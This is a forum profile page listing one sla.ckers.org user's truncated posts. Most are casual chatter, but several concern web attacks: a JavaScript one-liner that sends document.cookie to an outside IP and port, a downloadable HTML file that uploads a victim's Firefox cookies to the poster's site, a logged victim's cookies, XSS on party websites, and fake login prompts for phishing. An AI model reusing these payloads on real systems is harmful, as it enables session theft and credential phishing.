Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 

Current Page: 1 of 1
Results 1 - 27 of 27
6 years ago
bsoric
Whoa. I came back to this thread after my other website told me someone had searched for "Sla.ckers xss bsoric". I'm shocked that it was interesting enough for them to report it in the news.
Forum: Full Disclosure
6 years ago
bsoric
The liberals caught on and fixed their vulnerability.
Forum: Full Disclosure
7 years ago
bsoric
I submitted a link to the Chaser's guestbook, but it got moderated out :(
Forum: Full Disclosure
7 years ago
bsoric
Yes, you can.
Forum: XSS Info
7 years ago
bsoric
I just got up, but 3 hours ago someone ran my file from an IP I don't recognise. Being the responsible and totally non-evil person that I am, I'm deleting their cookies from my logs. IP: 209.26.20.xx | Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 | DATE: Tuesday 14th 2007f August 2007 07:21:16 AM <pre># HTTP Cookie File # http://ww
Forum: Projects
7 years ago
bsoric
Yeah, it's definitely a Wine issue. Luckily enough for Linux users, most people don't run IE in Wine, as root, so it's not going to be able to access or upload the shadow file anywhere (/etc/passwd doesn't include hashes anymore). Interesting find though.
Forum: Full Disclosure
7 years ago
bsoric
Ah, I see. It works (and quicker than my way), but it first shows a "This script is UNSAFE!!!" dialog and makes me wait a few seconds before I can allow it.
Forum: Projects
7 years ago
bsoric
The error console is giving me "Permission denied to get property UnnamedClass.Constructor" when I try to run that code. But that is what I want, yes.
Forum: Projects
7 years ago
bsoric
It just occurred to me that people may be a tiny bit hesitant to download and open a webpage which is designed to send away their cookies. So, here's the source: <html><head> <title></title> </head><body> <script> function findOS(st) { var OSes = new Array("file:///C:/Users/","file:///C:/Documents%20and%20Settings/"); try {
Forum: Projects
7 years ago
bsoric
I actually have the opposite problem- not enough spam. spam-me-hard@bsoric.com
Forum: Full Disclosure
7 years ago
bsoric
http://www.liberal.org.au/ http://www.alp.org.au/ And just in time for the elections, too.
Forum: Full Disclosure
7 years ago
bsoric
After reading http://www.gnucitizen.org/blog/web-pages-from-hell I wrote an HTML file with Javascript to find the local user's Firefox cookies.txt file and upload it to my website. The file is here: http://www.bsoric.com/Files/thief.zip (It's zipped to force the user to download and run it from file:///) I've tested it on friends' computers with XP and Vista and had it work. I also tested it
Forum: Projects
7 years ago
bsoric
Thank you very much- that is exactly what I was looking for.
Forum: XSS Info
7 years ago
bsoric
Just a quick, possibly moronic question: Is it possible to use HTML or Javascript to create a Basic Authentication-looking login screen which will submit the username and password using Get or Post? For example, I have an XSS on example.com. I want a screen to popup saying "Enter username and password for "Group" on "example.com"". I understand I could have an i
Forum: XSS Info
7 years ago
bsoric
I prefer Python, except when you try to paste the code onto a forum or webpage. I've messed around a bit with Perl, but it's too ugly for me.
Forum: OMG Ponies
7 years ago
bsoric
I'm from Australia too, and am also interested in web app sec.
Forum: OMG Ponies
7 years ago
bsoric
But how proud would your grandmothers be?
Forum: OMG Ponies
7 years ago
bsoric
One of the toilets in my house flushes clockwise, the other flushes anticlockwise. I suspect it's got more to do with the shape of the toilet.
Forum: OMG Ponies
7 years ago
bsoric
19. Re: ssh
I have a few accounts on my SSH server set up with a password of "password", running a fake bash shell which logs any commands and returns an error message. Very few people actually attempt to do anything once they find an open account, so I wouldn't worry about it too much (unless your password is "password", the name of the user, or "test".)
Forum: Networking
7 years ago
bsoric
Earlier today I was thinking what would happen if you just gathered a whole heap of email addresses and tried using "Smith" as the mother's maiden name for each.
Forum: OMG Ponies
7 years ago
bsoric
In Australia his name is Wally. And he's in the bottom left corner.
Forum: OMG Ponies
7 years ago
bsoric
Could you phish the password back?
Forum: OMG Ponies
7 years ago
bsoric
www.realvnc.com/docs/rfbproto.pdf Look at Section 6.2 - Security Types There's a whole heap of different authentication methods, and different clients/servers support different ones. The most common method I know of is for the client to DES encrypt a challenge string with the password and then send it back.
Forum: OMG Ponies
7 years ago
bsoric
Ahh, clever. I guess you could probably just use an online mail sender to send the cookie to a dodgeit.com account or something as well.
Forum: XSS Info
7 years ago
bsoric
Personally, rather than use a PHP cookie stealer, I just leave a port open on my router that logs everything to a file and then closes the connection. It just seems simpler. javascript:window.location="http://ip:1234/" + document.cookie == GET /IGTP=LI=1:TP=H4sI*************************************************570 HTTP/1.1 Host: 1.0.0.1:1234 User-Agent: Mozilla/5.0 (X11; ; Linu
Forum: XSS Info
7 years ago
bsoric
Excellent, both of those worked. Thank you very much.
Forum: XSS Info
7 years ago
bsoric
Hello everyone, I've found a page in a website which echoes back some input without checking/escaping quotes or anything, however unfortunately it's capitalising everything I put in there, which Javascript doesn't like. I tried URL-encoding the XSS, but it still returns <SCRIPT>ALERT("A");</SCRIPT> Is there some way of getting past this? Or at least some Javascript that
Forum: XSS Info
Current Page: 1 of 1